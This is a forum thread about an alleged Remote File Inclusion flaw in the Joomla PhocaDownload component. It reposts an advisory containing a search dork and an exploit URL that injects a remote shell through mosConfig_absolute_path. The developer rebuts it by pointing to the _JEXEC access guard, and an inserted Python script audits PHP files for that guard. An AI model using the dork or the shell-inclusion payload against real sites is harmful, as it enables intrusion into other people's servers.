
Author Topic: Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability  (Read 3694 times)

jeckodevelopment (Administrator)
No further information is available yet about the alleged RFI (Remote File Inclusion) vulnerability in the PhocaDownload component; we recommend visiting the component developer's site often and checking for any updates.

Code:
=========================================================

Joomla Component Phocadownload RFI Vulnerability

=========================================================
Title : Joomla Component phocadownload RFI Vulnerability
Software : Phocadownload
Vendor : http://www.phoca.cz/
Download :
http://www.phoca.cz/download/category/4-phoca-download-component

###########################################
Dork : inurl:index.php?option="com_phocadownload"
-----------------------------------------------------------------------
RFI Exploit

Exploit :

http://example.com/components/com_phocadownload/phocadownload.php?mosConfig_absolute_path=[ Shell txt ]


H13
Hi, Phoca Download does not work with the variable: mosConfig_absolute_path

Mostly, Joomla! itself doesn't allow the file to be accessed directly.

Exactly:
phocadownload.php is protected by:
defined( '_JEXEC' ) or die( 'Restricted access' );

so you get "Restricted access", nothing more.

Jan
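
One way to check the guard quoted in the reply above across a whole component directory, as an added example (not code from this thread or from Phoca Download): it reports every `.php` file where the `_JEXEC` guard is missing or is not the first statement. The function names and the sample sources are constructed for illustration.

```python
import re
from pathlib import Path

# The guard quoted in the reply above; also accepts the "\defined", "||" and exit spellings.
GUARD = re.compile(
    r"""\\?defined\s*\(\s*['"]_JEXEC['"]\s*\)\s*(?:or|\|\|)\s*(?:die|exit)\b""", re.I)
# Comments (naive: a comment marker inside a string literal is treated as a comment too).
COMMENTS = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.S)
# Declarations that may legitimately precede the guard.
PREAMBLE = re.compile(r"\s*(?:<\?php|(?:namespace|use|declare)\b[^;]*;)", re.I)


def guard_status(source: str) -> str:
    """Return 'ok', 'late' (guard exists but code runs before it) or 'missing'."""
    code = COMMENTS.sub("", source)
    pos = 0
    while (m := PREAMBLE.match(code, pos)):
        pos = m.end()
    rest = code[pos:].lstrip()
    if GUARD.match(rest):
        return "ok"
    return "late" if GUARD.search(rest) else "missing"


def audit_component(root: Path) -> dict[str, str]:
    """Map each .php file under root (relative path) to its guard status."""
    return {
        p.relative_to(root).as_posix(): guard_status(p.read_text(errors="replace"))
        for p in sorted(root.rglob("*.php"))
    }


# Constructed samples, not taken from Phoca Download.
GUARDED = "<?php\n/* header */\ndefined( '_JEXEC' ) or die( 'Restricted access' );\nrequire_once 'helper.php';\n"
LATE = "<?php\nrequire_once $base . '/helper.php';\ndefined('_JEXEC') or die;\n"
UNGUARDED = "<?php\nrequire_once $mosConfig_absolute_path . '/helper.php';\n"

if __name__ == "__main__":
    for name, src in [("guarded", GUARDED), ("late", LATE), ("unguarded", UNGUARDED)]:
        print(f"{name}: {guard_status(src)}")
```

Files reported as `late` or `missing` are the ones to review by hand, since they can execute statements when requested directly instead of through Joomla's `index.php`.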


mau_develop (Guest)
Yeah! ... of course... like others without a short PoC or disclosure.... only kiddie and obsolete advisory service

thanks for your post and script

bye

M.

 


